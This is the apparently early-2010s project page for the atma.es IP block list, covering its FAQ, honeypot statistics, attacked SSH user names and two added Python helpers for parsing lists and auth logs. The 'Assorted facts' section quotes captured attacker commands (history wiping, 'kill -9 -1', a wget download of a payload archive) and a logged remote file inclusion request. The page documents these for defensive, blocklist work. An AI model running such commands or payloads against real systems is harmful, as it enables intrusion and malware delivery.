
Mission
We identify, gather and classify dangerous IP addresses such as:
- Attackers who try to spy on or remotely control others' computers by means such as Microsoft remote terminal, SSH, Telnet or shared desktops.
- Threats to email servers or users: spiders/bots, account hijacking, etc.
- Sites spreading viruses, trojans, spyware, etc., or just being used by them to let their authors know that a new computer has been infected.
- Threats to servers: exploits, fake identities/agents, DDoS attackers, etc.
- Port scans, which are the first step towards more dangerous actions.
- Malicious P2P sharers or bad peers who spread malware, inject bad traffic or share fake files.
An updated list is published every 3-4 days, ready to be used with any blocking program. All you need to do is add it to your favourite program using one of the URLs below:
http://galinux.myftp.org/atma.p2p
http://list.iblocklist.com/?list=tzmtqbbsgbtfxainogvm (Gz compressed)
Documentation
How-to:
- Peerguardian 2 for Windows
- IPlist/IPblock 0.26 for Linux
FAQ
How can I use the blacklist/atma deny list?
Most blocking programs come with a few pre-configured lists. Unfortunately, blacklist/atma is not among them as far as we know, so you need to configure your blocking program yourself. While this is an easy task in every case, there are no universal instructions valid for all of them. Our list is published in PeerGuardian 1 format, which is compatible with nearly all existing programs and is human readable "as is". If you are not using a blocking program yet, please go to the downloads section.
Concerning the terms of use, feel free to use it for any purpose as long as you keep the notice in its header (the comments in the first lines of the list) or give credit in any other fair way instead. If in doubt, please contact us.
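As an added example (not code from the atma project), here is a small Python reader for the PeerGuardian 1 (.p2p) format the list is published in. It assumes the usual `description:first-last` line layout with `#` comment lines forming the header notice; the sample list is constructed.

```python
import ipaddress

# Constructed sample in PeerGuardian 1 (.p2p) format, not the real blacklist/atma list.
# Each entry is description:first-last; lines beginning with # form the header notice.
SAMPLE_P2P = """\
# blacklist/atma sample (constructed) - keep this notice when redistributing
# updated: placeholder date
SSH attack:203.0.113.5-203.0.113.5
Port scan:198.51.100.0-198.51.100.255
Several threats: HTTP/SQL:192.0.2.10-192.0.2.20
"""

def header_notice(text):
    """Return the comment lines at the top of the list (the notice that must be kept)."""
    notice = []
    for line in text.splitlines():
        if not line.startswith("#"):
            break
        notice.append(line)
    return notice

def parse_p2p(text):
    """Parse .p2p lines into (first, last, description) tuples sorted by first address."""
    ranges = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        # the description itself may contain colons, so split on the last one
        desc, sep, span = line.rpartition(":")
        if not sep or span.count("-") != 1:
            raise ValueError(f"line {lineno}: expected description:first-last")
        first, last = (int(ipaddress.IPv4Address(p.strip())) for p in span.split("-"))
        if first > last:
            raise ValueError(f"line {lineno}: first address is above last address")
        ranges.append((first, last, desc.strip()))
    return sorted(ranges)

def lookup(ranges, ip):
    """Description of the first sorted range containing ip, or None if it is not listed."""
    n = int(ipaddress.IPv4Address(ip))
    for first, last, desc in ranges:
        if first > n:
            break  # ranges are sorted by first address; no later one can contain n
        if n <= last:
            return desc
    return None
```

Because the loop stops at the first range whose start is above the queried address, a lookup over a multi-megabyte list only scans the entries that could possibly match.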
Why should I use this list when my program of choice already comes with some others preconfigured?
Mainly for one reason: we believe that we identify a good deal of IPs not listed anywhere else before. This is how we try to do it:
- We identify most dangerous IPs with our own tools, which are not based on any others. They should be harder to evade because attackers don't know how they work, if they know about their existence at all. Moreover, they can't know where we are lurking because we use dynamic IPs. In other words, when a threat is detected, the attacker will find its IP published within some 50 hours, but we will have changed ours before then, so there is no use in them reviewing hundreds of logs or warning other attackers.
- We are Spanish speakers and we use that language for almost everything we do: websites, mailing, programming... Most attackers either are native English speakers or have very good skills in that language, but it is not very likely that they understand Spanish. That's why they might be detected by us without even knowing how and where it happened.
- As of now, we are a small group. If we intend to harvest a large number of attacks we just cannot sit and wait for them to appear. Thus, we don't rely on passive detection but try to attract as many attacks as possible instead (obviously, we can't explain in detail how we do it).
Should I use this list alone or along with some others?
For one thing, the more lists you use, the slower your computer might run. On the other hand, although we add IPs from other sources, it is always safer to block them from several lists, perhaps updated more often or larger. What you should ask yourself is: am I concerned with most of the threats that blacklist/atma deals with? We believe that a wide variety of users should use it, especially those using P2P and/or running any kind of server.
Bear in mind that we don't list IPs:
- Related to sex, ads, P2P trackers, etc. unless they explicitly pose a threat or risk.
- Some of the reserved IPs/ranges for local nets, testing, etc. listed in http://tools.ietf.org/html/rfc3330
- Belonging to the most used services, tools or companies: Google, Microsoft, Rapidshare, Yahoo and some others.
(Please note that even a common search in Google could lead you to malicious sites, for instance.)
If you want to block any of them, you definitely need extra lists.
Will I get rid of antivirus, anti-spyware and firewalls?
Not at all. Using a blocking program along with our list or any other just prevents your computer from contacting some others. That's all. For instance, you can still get your computer infected by sharing a memory card or by opening an infected email, even if delivered by a trustworthy ISP.
Is atma/blacklist a widely used list?
We guess not, but we have no reliable data other than that of galinux.myftp.org. As a rough indication, the list was downloaded more than 5000 times from there in January 2010.
What do the descriptions mean?
When using a blocking program you will see different kinds of alerts. Those provided by our list fall into three main categories:
- Attacks targeting HTTP/SQL/FTP/PHP servers
- Peers that spoil P2P or use it for spreading malware
- Other generic threats for most users and systems
Note this: each attack goes towards a specific target, but that doesn't mean that the attacker would refuse to take advantage of unexpected vulnerabilities. The same goes for operating systems: you could see an "SSH attack" alert and think "well, I'm running Windows, which does not use that stuff, so I'm safe". Wrong. We are telling you that we have detected an SSH attack from that IP, but it is very likely they could run other kinds of attacks.
Some items represent fairly benign actions, such as port scans or pinging. On the contrary, those labeled as "Several threats" are the most dangerous.
Assorted facts
Some SSH attacks (commands typed by the attackers, grouped by intent):
| Gathering information | After a previous successful login | Attempting to get rid of the honeypot | Sending malware to the target |
| w; uptime; id; ls -a; uname -a; cat /proc/cpuifno; ps x; wget; curl -O | rm -rf .bash_history; history -c; w; ps x; ls -a | bash; sh; kill -9 -1; reboot; exit | uname -a; passwd; wget http://nasa.undernet.nm.ru/udp.tgz; tar zxvf udp.tgz |
Other deliveries came from
Some notable detections:
- Sharing fake files on the Gnutella network from 65.55.102.24 (Microsoft Corporation), October 21st and November 1st, 2009.
- Port scan from 208.43.71.139 (Avast Antivirus) in September and October 2009.
- Port scan from 69.48.241.84 (www.trustedsource.org, owned by McAfee Antivirus) on December 21st, 2009.
Statistics of blocking programs downloading blacklist/atma during the first week of December 2009:
| Program/Version | Downloads |
| PeerBlock/1.0.0.181 | 760 |
| PeerGuardian/2.0 | 253 |
| PeerBlock/1.0.0.202 | 112 |
| PeerBlock/1.0.0.223 | 43 |
| BlockControl/1.6.9 | 14 |
| PeerBlock/0.9.2.86 | 7 |
| IPblock/0.18 | 4 |
| IPblock/0.27 | 4 |
| IPblock/0.26 | 2 |
| PeerBlock/1.0.0.187 | 1 |

| Program | Total |
| PeerBlock | 916 |
| PeerGuardian | 253 |
| BlockControl | 14 |
| IPblock | 11 |
During September 2009 attackers tried to log in under 10374 different user names. The most attacked were (number of attempts above each name):
| 9850 | 1034 | 690 | 431 | 264 | 224 | 208 | 206 | 195 | 190 |
| root | admin | test | oracle | user | guest | robert | mysql | michael | paul |
| 190 | 177 | 176 | 176 | 168 | 166 | 162 | 154 | 152 | 148 |
| info | postgres | amanda | adam | sales | martin | backup | student | ftpuser | suporte |
| 132 | 130 | 130 | 130 | 126 | 126 | 124 | 120 | 115 | 114 |
| testing | nagios | eric | david | web | tester | john | richard | sarah | sam |
| 114 | 110 | 107 | 106 | 104 | 102 | 101 | 100 | 100 | 100 |
| patrick | bruce | matt | mark | cyrus | teste | marc | webmaster | download | |
Advice: choosing user names in any language other than English is safer. Spanish speakers should avoid "David" (a common name in both languages).
Bad boys never sleep:
December 24th, 2009, at nightfall. While many countries were celebrating Christmas Eve, attackers were taking advantage of it. The most striking one we detected during those hours was an SSH dictionary attack from 209.44.120.2. It lasted for 8 hours and they tried 20,859 username + password combinations.
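An added example, not part of the original page, for both the user name ranking above and the dictionary attack just described: Python that reads sshd failure lines (constructed here in the style of /var/log/auth.log) and produces a per-user ranking plus a list of sources that hammered several names, which is the shape a dictionary attack leaves in a server's own logs.

```python
import re
from collections import Counter, defaultdict

# Constructed sshd lines in the syslog style of /var/log/auth.log; not real captures.
SAMPLE_AUTH_LOG = """\
Dec 24 21:03:11 host sshd[4112]: Failed password for root from 203.0.113.5 port 50213 ssh2
Dec 24 21:03:13 host sshd[4114]: Failed password for invalid user admin from 203.0.113.5 port 50214 ssh2
Dec 24 21:03:15 host sshd[4116]: Failed password for invalid user test from 203.0.113.5 port 50215 ssh2
Dec 24 21:03:17 host sshd[4118]: Failed password for root from 203.0.113.5 port 50216 ssh2
Dec 24 21:04:02 host sshd[4120]: Failed password for invalid user oracle from 198.51.100.9 port 40001 ssh2
Dec 24 21:05:40 host sshd[4125]: Accepted publickey for deploy from 192.0.2.44 port 52000 ssh2
"""

# "invalid user" appears when the name does not exist on the box; both forms are failures.
FAILED_RE = re.compile(
    r"sshd\[\d+\]: Failed password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\d{1,3}(?:\.\d{1,3}){3}) port \d+"
)

def failed_logins(text):
    """Yield (source ip, user name) for every failed sshd password attempt."""
    for line in text.splitlines():
        m = FAILED_RE.search(line)
        if m:
            yield m.group("ip"), m.group("user")

def attempts_per_source(text):
    """Map each source IP to (failed attempts, distinct user names tried)."""
    counts, users = Counter(), defaultdict(set)
    for ip, user in failed_logins(text):
        counts[ip] += 1
        users[ip].add(user)
    return {ip: (counts[ip], len(users[ip])) for ip in counts}

def top_usernames(text, n=5):
    """Most attempted user names, the same kind of ranking as the table above."""
    return Counter(user for _, user in failed_logins(text)).most_common(n)

def dictionary_attack_sources(text, min_attempts=3, min_users=2):
    """Sources whose failures span several names: the signature of a dictionary attack."""
    return sorted(ip for ip, (attempts, names) in attempts_per_source(text).items()
                  if attempts >= min_attempts and names >= min_users)
```

The thresholds are placeholders; on a real server they should be tuned against normal typo rates so that a user mistyping a password twice is not reported alongside a source cycling through hundreds of names.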
Weird ways of fighting cybercrime:
Visit from www.delitosinformaticos.gov.co (Colombian government agency "Grupo Investigativo Delitos Informáticos"):
200.93.147.154 - - [17/Feb/2010:13:57:49 +0200] "GET //poll//booth.php?include_path=http://www.iseulbi.com/id1.txt?? HTTP/1.1" 404 613 www.atma.es "-" "Mozilla/5.0" "-"
No comment.
Get involved
1-Use and spread our list
Help us and help others by letting them know about us. You could link to us from your blog or website, tell your contacts about atma.es... On the other hand, since downloads are steadily increasing, we would like to have the list (it is only 2-3 MB) mirrored on some more sites. If you are willing to set one up, please contact us.
2-Sending your logs to us
We have developed some automatic tools that collect, select, classify and merge IPs from a variety of logs. If you think that some on your system could help us, please drop us a line. As of now, we can directly use logs from several P2P programs, some models of routers, Linux logs and a handful of other stuff.
3-Reporting assorted IPs/ranges
If you know how to identify them in a particular context you could report them to us.
4-Run a "honey pot"
You can think of a "honey pot " as a disguise that can turn your local net or computer into an absolutely different thing when seen from an attacker's point of view. Installing a basic one can be quite effective while easy to set up. If you need a little help, here we are!
5-Warn us about false positives, changed IPs, etc.
Sometimes we may be wrong and add some innocent IP to the list. But that is not the only issue we have to face; for instance, we need to remove old entries when they have become safe, to exchange lots of info, to deal with lots of emails... We will always welcome your help.
6-Special request for english speakers
The English version of this page is still a draft. We would like you to help us by warning us about typos, wrong expressions and so on.
Links
Blocking programs for Microsoft Windows
Blocking programs for Linux
Blocking programs for Mac-OS
If you know about any other not listed here, please tell us.
Third-party sources
In our list we add the newest threats detected by other trustworthy sources:
| MalwareDomainList.com | sshBL.org |
| ProjectHoneyPot.org | Sans.org |
| Twitter.com/olaf_j | DnsBL.abuse.ch |
| Antispam.Andreotti.nl | Twitter.com/HoneyPoint |
| Autoshun.org | MaliciousNetworks.org |
Please note that we select IPs following our own criteria rather than automatically adding every single one from every source. That's why you could find IPs that are listed in some of them but missing in atma/blacklist.
Occasionally we also visit:
HoneyNet.cz, Cimsuyu.com, MalwareURL.com, Amos.TwilightParadox.com, Fugitif.DynDns.org, Lira.cis.upenn.edu, Smp.rnc.ro, Shinshu.fm/, Mtc.sri.com, Proxy1.twaren.net, Dr-data.net, Websworld.org, EmergingThreats.net, MalwarePatrol.net, ZeusTracker.abuse.ch, Cs.Rutgers.edu, StopForumSpam.com, Semeliker.net, Old-noritake.org, assurtis-tours.com, Danger.rulez.sk, Tcc.edu.tw, IPillion.com
Contact
Visit our Google group (spanish only) or send us an email.

